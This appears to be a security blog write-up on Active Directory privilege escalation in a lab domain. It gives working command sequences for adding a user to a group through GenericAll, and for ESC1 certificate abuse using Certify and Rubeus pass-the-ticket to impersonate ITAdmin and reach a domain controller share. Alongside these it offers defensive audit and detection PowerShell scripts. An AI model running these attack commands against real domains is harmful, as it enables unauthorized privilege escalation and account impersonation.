June 10, 2026
Internal Active Directory Attack
Introduction
0xM0G4D
6 min read
Introduction
This report highlights several Active Directory attack techniques that can be used to identify and exploit privilege escalation opportunities within a domain.
- Control Path Analysis — Identifying attack paths and privilege relationships.
- Certificate Abuse (AD CS) — Exploiting certificate service misconfigurations.
- Privilege Escalation — Gaining elevated privileges through Active Directory weaknesses.
## ADeleg.exe
ADeleg.exe is a specialized tool used to analyze and audit Active Directory Delegations and Access Control Lists (ACLs). Unlike exploitation-focused tools such as BloodHound or Certipy, ADeleg is primarily designed to identify delegated permissions and non-default ACL configurations that may introduce security risks or lead to privilege escalation opportunities within the Active Directory environment.
Key Capabilities
- Identifying users and groups with unexpected or excessive permissions.
- Reviewing delegated permissions on Organizational Units (OUs), users, and groups.
- Discovering potentially dangerous permissions, including:
  - WriteDACL
  - WriteOwner
  - GenericAll
  - GenericWrite
  - Reset Password permissions
Relationship to Control Path Analysis
ADeleg is highly effective at identifying risky ACLs and delegated permissions, while BloodHound excels at visualizing complete attack paths across the Active Directory environment.
These tools are often used together:
- BloodHound → Identifies and maps attack paths.
- ADeleg → Provides detailed visibility into the ACLs and delegated permissions responsible for those paths.
Commands
Display help information:
```
ADeleg.exe -h
```

Export findings to a CSV file:

```
ADeleg.exe --csv ADelegOutput.csv
```

The exported results can then be reviewed and filtered to identify potentially dangerous permissions and privilege escalation opportunities.
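The same review can be scripted so that it runs on a schedule. The following is an added example, not ADeleg's own code; it assumes the RSAT ActiveDirectory module, read access to object security descriptors, and an "expected principals" list that every domain has to adjust:

```powershell
# Added audit example (not part of ADeleg): list non-default principals that hold the rights
# the report above calls dangerous on every user and group object in the domain.
# Assumes the RSAT ActiveDirectory module and an account allowed to read security descriptors.
Import-Module ActiveDirectory

$ResetPasswordGuid = [guid]'00299570-246d-11d0-a768-00aa006e0529'   # "Reset Password" extended right
$DangerousRights   = 'GenericAll', 'GenericWrite', 'WriteDacl', 'WriteOwner'

# Principals expected to control objects; anything else holding these rights is reported.
# Assumption: adjust this list to the domain being audited.
$ExpectedPrincipals = @(
    'NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', 'CREATOR OWNER',
    "$env:USERDOMAIN\Domain Admins", "$env:USERDOMAIN\Enterprise Admins"
)

function Get-DangerousAce {
    param([Parameter(Mandatory)][string]$DistinguishedName)
    $acl = Get-Acl -Path "AD:\$DistinguishedName"
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $who = $ace.IdentityReference.Value
        if ($ExpectedPrincipals -contains $who) { continue }
        $rights = $ace.ActiveDirectoryRights.ToString()
        $hits   = @($DangerousRights | Where-Object { $rights -match $_ })
        # ExtendedRight with an empty ObjectType means "all extended rights", which includes Reset Password.
        $isReset = ($rights -match 'ExtendedRight') -and
                   ($ace.ObjectType -eq $ResetPasswordGuid -or $ace.ObjectType -eq [guid]::Empty)
        if ($isReset) { $hits += 'ResetPassword' }
        if ($hits.Count -gt 0) {
            [pscustomobject]@{
                Object    = $DistinguishedName
                Principal = $who
                Rights    = $hits -join ','
                Inherited = $ace.IsInherited
            }
        }
    }
}

# Audit every group and user, then review the CSV the same way as ADeleg's --csv output.
$targets = @(Get-ADGroup -Filter *) + @(Get-ADUser -Filter *)
$targets | ForEach-Object { Get-DangerousAce -DistinguishedName $_.DistinguishedName } |
    Export-Csv -Path .\DangerousAces.csv -NoTypeInformation
```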
Source
The tool is available as an open-source project on GitHub.
## NetTools
NetTools is a Windows-based Active Directory enumeration and administration tool used to gather information about domain objects, network services, and security-related configurations. It provides a graphical interface that simplifies Active Directory reconnaissance and helps identify potential attack paths and security weaknesses.
Key Capabilities
- Enumerating domain users, groups, and computers.
- Querying Active Directory objects and attributes.
- Reviewing group memberships and delegated permissions.
- Identifying domain and forest trust relationships.
- Gathering information from LDAP, DNS, SMB, and other network services.
- Assisting in the discovery of privilege escalation opportunities.
Role in Active Directory Assessments
NetTools is commonly used during the enumeration phase of an Active Directory assessment. It helps security professionals collect detailed information about the environment and identify areas that require further investigation.
These findings can be leveraged to:
- Understand the Active Directory structure.
- Identify privileged accounts and groups.
- Discover trust relationships.
- Locate potential attack paths.
- Support privilege escalation analysis.
Source
The tool is available as an open-source project on GitHub.
## Locksmith
Locksmith is an Active Directory Certificate Services (AD CS) assessment tool designed to identify and report certificate-related misconfigurations that could be abused by attackers. The tool focuses on detecting insecure certificate templates, enrollment permissions, and other weaknesses associated with certificate-based authentication.
Key Capabilities
- Identifying vulnerable AD CS configurations.
- Detecting insecure certificate templates.
- Reviewing enrollment and issuance permissions.
- Discovering common AD CS misconfigurations associated with ESC attack paths.
- Highlighting certificate abuse opportunities that may lead to privilege escalation.
Role in Active Directory Assessments
Locksmith is commonly used during AD CS security assessments to evaluate the security posture of certificate services within the domain. The tool helps identify weaknesses that could allow attackers to request certificates, impersonate privileged users, or gain unauthorized access through certificate-based authentication.
These findings can be leveraged to:
- Identify certificate abuse opportunities.
- Assess AD CS security risks.
- Support privilege escalation analysis.
- Improve certificate service hardening efforts.
Source
The tool is available as an open-source project on GitHub.
One common Active Directory privilege escalation scenario involves abusing the GenericAll permission on a group object. Since GenericAll grants full control over the target object, an attacker can modify its attributes, including group membership.
In this example, the membership of the "Template Managers" group was first reviewed using the following command:
```powershell
Get-ADGroup "Template Managers" -Properties Members | Select-Object -ExpandProperty Members
```

A user account with GenericAll permissions over the group then added the user Suzie to the group:

```powershell
Add-ADGroupMember -Identity "Template Managers" -Members "Suzie" -ErrorAction SilentlyContinue
```

The group membership was verified afterward to confirm that the modification was successful:

```powershell
Get-ADGroup "Template Managers" -Properties Members | Select-Object -ExpandProperty Members
```

Finally, the affected user was required to log off and log back on (or use runas) to refresh the security token and obtain the privileges associated with the new group membership.
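On the defensive side, a membership change like this one leaves Security events on the domain controller no matter which delegated right made it possible. The following added example (not from the report) reads those events against a constructed watch list; the group names and the localhost default are assumptions:

```powershell
# Added detection example (not from the original report): surface additions to sensitive groups by
# reading the Security events 4728/4732/4756 that a domain controller writes for every member-add,
# whichever ACL path or tool (Add-ADGroupMember, ADSI, LDAP) performed it.
$SensitiveGroups = 'Template Managers', 'Domain Admins', 'Enterprise Admins', 'Schema Admins', 'Cert Publishers'

function Get-SensitiveGroupAddition {
    param(
        [string]$ComputerName = 'localhost',   # assumption: a DC whose Security log you may read
        [int]$Hours = 24
    )
    $filter = @{
        LogName   = 'Security'
        Id        = 4728, 4732, 4756           # member added to a global / local / universal security group
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    Get-WinEvent -ComputerName $ComputerName -FilterHashtable $filter -ErrorAction SilentlyContinue |
        ForEach-Object {
            $evt  = $_
            # Pull EventData fields by their Name attribute from the event XML, not by position.
            $data = @{}
            ([xml]$evt.ToXml()).Event.EventData.Data | ForEach-Object { $data[$_.Name] = $_.'#text' }
            [pscustomobject]@{
                Time    = $evt.TimeCreated
                EventId = $evt.Id
                Group   = $data['TargetUserName']
                Member  = $data['MemberName']       # DN of the account that was added
                AddedBy = "$($data['SubjectDomainName'])\$($data['SubjectUserName'])"
            }
        } |
        Where-Object { $SensitiveGroups -contains $_.Group }
}

# Who was added to a watched group in the last day, newest first; the AddedBy column is the
# account whose delegated rights (for example GenericAll on the group) should be reviewed.
Get-SensitiveGroupAddition -Hours 24 | Sort-Object Time -Descending | Format-Table -AutoSize
```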
## Certify.exe
Certify.exe is an Active Directory Certificate Services (AD CS) assessment tool developed by SpecterOps. It is used to enumerate certificate infrastructure, identify misconfigured or vulnerable certificate templates, and detect potential certificate-based attack paths in a domain.
Key Capabilities
- Enumerates AD CS components like Certificate Authorities (CAs)
- Discovers and analyzes certificate templates
- Identifies insecure or exploitable configurations
- Helps detect privilege escalation paths via certificates
Role in AD Assessments
Certify is mainly used during the enumeration phase to understand how certificate services are configured and where weaknesses exist. It helps security testers map attack paths related to AD CS.
Certificate Abuse
If a vulnerable template is found, an attacker may be able to request a certificate that can be used to impersonate other users, including privileged accounts.
Security Impact
- Misconfigured certificate template abuse
- User or admin impersonation
- Privilege escalation
- Potential persistence using issued certificates
First, the attacker enumerates AD CS to find vulnerable templates:
```
./Certify1.exe find /showallpermissions
```
This command lists all certificate templates and their permissions to identify weak or over-permissive access (who can enroll or modify templates).
After identifying a vulnerable template like webserver2026, the attacker checks or uses it:
```
./Certify2.exe manage-template --template webserver2026 --supply-subject --client-auth
```

- `--template webserver2026` → selects the target certificate template
- `--supply-subject` → allows the attacker to choose another user's identity
- `--client-auth` → enables the certificate for authentication
If the template is misconfigured, the attacker can request a certificate that can be used to authenticate as another user in the domain.
Enumerate Certificate Authorities
First, identify the available Certificate Authorities (CAs) in the domain:
```
.\Certify1.exe find cas
```

Purpose
- Lists all Enterprise Certificate Authorities.
- Identifies the correct CA name required when requesting a certificate.
Obtain the Target User SID
Next, retrieve the SID of the privileged account:
```powershell
(Get-ADUser ITAdmin -Properties objectSID | Select -ExpandProperty objectSID).Value
```

Purpose
- Retrieves the Security Identifier (SID) for the ITAdmin account.
- The SID may be required for certificate mapping and validation in some environments.
Request a Certificate as ITAdmin
After identifying a vulnerable template (Webserver2026), request a certificate while specifying the target user's UPN:
```
.\Certify2.exe request -ca "Eureka-ADCS01.eureka.local\EUREKA-ADCS01-CA" -template Webserver2026 -upn ITAdmin
```

Parameters
- `-ca` → Specifies the target Certificate Authority.
- `-template Webserver2026` → Selects the vulnerable certificate template.
- `-upn ITAdmin` → Requests a certificate containing the UPN of the privileged user.

Purpose
- If the template allows the requester to supply subject information (ESC1 condition), a certificate can be issued that represents the ITAdmin account.
- The issued certificate can later be used for authentication as that user.
Save the Issued Certificate
After the certificate is issued, copy the Base64 certificate blob returned by Certify.
Purpose
- Preserves the certificate for later authentication.
- Provides evidence of successful certificate issuance.
Request a Kerberos TGT Using the Certificate
Use the issued certificate with Rubeus to obtain a Kerberos Ticket Granting Ticket (TGT):
```
.\Rubeus.exe asktgt /user:ITAdmin /ptt /certificate:<certificate_blob>
```

Parameters
- `/user:ITAdmin` → Target account to authenticate as.
- `/certificate` → The certificate obtained from the vulnerable template.
- `/ptt` → Pass-The-Ticket; injects the TGT into the current session.

Purpose
- Performs certificate-based Kerberos authentication (PKINIT).
- Requests a TGT for the ITAdmin account.
- Loads the ticket into the current logon session.
Verify Access
Test access to the Domain Controller administrative share:
```
dir \\Eureka-DC01\c$
```

Purpose
- Verifies that the Kerberos ticket is valid.
- Confirms that authentication as ITAdmin was successful.
- Demonstrates access to resources available to the privileged account.
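The template condition that Locksmith reports and that the request above depended on (requester-supplied subject, an authentication EKU, no manager approval, no authorized signatures) can be audited straight from the Configuration partition. This is an added example, not code from Certify, Locksmith or the report; it assumes the ActiveDirectory module and a constructed list of broad principals:

```powershell
# Added audit example (not code from Certify, Locksmith or the original walkthrough): flag published
# templates that satisfy the ESC1 conditions the walkthrough relied on. Assumes the ActiveDirectory
# module and read access to the Configuration partition; flag values and OIDs are the AD CS constants.
Import-Module ActiveDirectory

$ENROLLEE_SUPPLIES_SUBJECT = 0x1            # msPKI-Certificate-Name-Flag: requester picks the subject/SAN
$PEND_ALL_REQUESTS         = 0x2            # msPKI-Enrollment-Flag: CA manager approval required
$AuthEkus = @(
    '1.3.6.1.5.5.7.3.2'                     # Client Authentication
    '1.3.6.1.4.1.311.20.2.2'                # Smart Card Logon
    '2.5.29.37.0'                           # Any Purpose
)
$EnrollRightGuid = [guid]'0e10c968-78fb-11d1-a9c2-0000f87a4e55'   # "Enroll" extended right
$BroadPrincipals = 'Authenticated Users', 'Domain Users', 'Domain Computers', 'Everyone'   # assumption

function Get-Esc1Template {
    $configNc = (Get-ADRootDSE).configurationNamingContext
    $pkiBase  = "CN=Public Key Services,CN=Services,$configNc"
    # Templates only matter once a CA publishes them (pKIEnrollmentService.certificateTemplates).
    $published = Get-ADObject -SearchBase "CN=Enrollment Services,$pkiBase" -LDAPFilter '(objectClass=pKIEnrollmentService)' -Properties certificateTemplates |
        ForEach-Object { $_.certificateTemplates }
    $props = 'msPKI-Certificate-Name-Flag', 'msPKI-Enrollment-Flag', 'msPKI-RA-Signature', 'pKIExtendedKeyUsage'
    foreach ($t in Get-ADObject -SearchBase "CN=Certificate Templates,$pkiBase" -LDAPFilter '(objectClass=pKICertificateTemplate)' -Properties $props) {
        $suppliesSubject = ($t.'msPKI-Certificate-Name-Flag' -band $ENROLLEE_SUPPLIES_SUBJECT) -ne 0
        $needsApproval   = ($t.'msPKI-Enrollment-Flag' -band $PEND_ALL_REQUESTS) -ne 0
        $needsSignature  = [int]$t.'msPKI-RA-Signature' -gt 0
        $ekus    = @($t.pKIExtendedKeyUsage)
        $authEku = ($ekus.Count -eq 0) -or [bool]($ekus | Where-Object { $AuthEkus -contains $_ })
        if (-not ($suppliesSubject -and $authEku -and -not $needsApproval -and -not $needsSignature)) { continue }
        # Who may enroll: the Enroll right (or all extended rights / GenericAll) granted on the template.
        $enrollers = (Get-Acl -Path "AD:\$($t.DistinguishedName)").Access | Where-Object {
            $_.AccessControlType -eq 'Allow' -and (
                $_.ActiveDirectoryRights -match 'GenericAll' -or
                ($_.ActiveDirectoryRights -match 'ExtendedRight' -and
                 ($_.ObjectType -eq $EnrollRightGuid -or $_.ObjectType -eq [guid]::Empty)))
        } | ForEach-Object { $_.IdentityReference.Value } | Sort-Object -Unique
        [pscustomobject]@{
            Template    = $t.Name
            Published   = $published -contains $t.Name
            BroadEnroll = [bool]($enrollers | Where-Object { $BroadPrincipals -contains $_.Split('\')[-1] })
            Enrollers   = $enrollers -join '; '
        }
    }
}

# Published ESC1-shaped templates that broad groups can enroll in are the ones to fix first:
# clear ENROLLEE_SUPPLIES_SUBJECT, require manager approval, or tighten the enroll ACL.
Get-Esc1Template | Where-Object { $_.Published } | Sort-Object BroadEnroll -Descending | Format-Table -AutoSize
```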
Summary
This assessment identified Active Directory privilege escalation opportunities through delegated permissions and AD CS misconfigurations. ADeleg, NetTools, Locksmith, and Certify were used to enumerate the environment, identify security weaknesses, and demonstrate abuse scenarios including GenericAll group membership modification and ESC1 certificate-based impersonation of privileged users.